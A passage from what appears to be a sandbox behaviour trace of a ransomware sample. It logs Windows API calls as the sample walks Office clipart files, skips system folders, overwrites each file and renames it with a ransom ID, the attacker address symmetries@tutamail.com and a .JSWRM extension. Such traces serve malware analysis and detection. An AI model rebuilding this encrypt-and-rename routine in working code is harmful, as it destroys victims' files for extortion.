(HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0086.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.524] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.527] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=59734) returned 1 [0086.527] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe950) returned 0x24d210 [0086.527] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xe950, lpOverlapped=0x0) returned 1 [0086.533] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.533] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xe950, lpOverlapped=0x0) returned 1 [0086.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.534] CloseHandle (hObject=0x314) returned 1 [0086.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0086.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0086.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0086.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0086.534] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0086.534] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.534] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185780.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185780.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0086.535] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.535] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x99a2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185786.WMF", cAlternateFileName="")) returned 1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2=".") returned 1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="..") returned 1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="...") returned 1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="windows") returned -1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="recovery") returned -1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="perflogs") returned -1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="documents and settings") returned 1 [0086.535] lstrcmpiW (lpString1="J0185786.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.536] lstrcmpiW (lpString1="J0185786.WMF", lpString2="system volume information") returned -1 [0086.536] lstrcmpiW (lpString1="J0185786.WMF", lpString2="msocache") returned -1 [0086.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185786.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185786.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185786.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0086.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185786.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185786.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185786.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0086.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.536] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0086.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.536] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=39330) returned 1 [0086.536] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.536] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x99a0) returned 0x24d210 [0086.537] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x99a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x99a0, lpOverlapped=0x0) returned 1 [0086.562] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.562] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x99a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x99a0, lpOverlapped=0x0) returned 1 [0086.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.563] CloseHandle (hObject=0x314) returned 1 [0086.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0086.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0086.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0086.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0086.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0086.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.564] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185786.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185786.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0086.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0086.565] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x50b6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185790.WMF", cAlternateFileName="")) returned 1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2=".") returned 1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="..") returned 1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="...") returned 1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="windows") returned -1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="recovery") returned -1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="perflogs") returned -1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="documents and settings") returned 1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="system volume information") returned -1 [0086.565] lstrcmpiW (lpString1="J0185790.WMF", lpString2="msocache") returned -1 [0086.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185790.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185790.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185790.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0086.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185790.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185790.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185790.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0086.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0086.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0086.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.565] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.565] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.566] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=20662) returned 1 [0086.566] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50b0) returned 0x24d210 [0086.567] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x50b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x50b0, lpOverlapped=0x0) returned 1 [0086.570] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.570] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x50b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x50b0, lpOverlapped=0x0) returned 1 [0086.570] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.570] CloseHandle (hObject=0x314) returned 1 [0086.570] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0086.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0086.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0086.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0086.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0086.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.571] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185790.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185790.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0086.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.572] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x650c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0185796.WMF", cAlternateFileName="")) returned 1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2=".") returned 1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="..") returned 1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="...") returned 1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="windows") returned -1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="recovery") returned -1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="perflogs") returned -1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="documents and settings") returned 1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="system volume information") returned -1 [0086.572] lstrcmpiW (lpString1="J0185796.WMF", lpString2="msocache") returned -1 [0086.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185796.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185796.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185796.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0086.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185796.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0185796.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0185796.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0086.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0086.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0086.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.573] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.573] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=25868) returned 1 [0086.574] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.574] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6500) returned 0x24d210 [0086.574] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6500, lpOverlapped=0x0) returned 1 [0086.577] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.577] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6500, lpOverlapped=0x0) returned 1 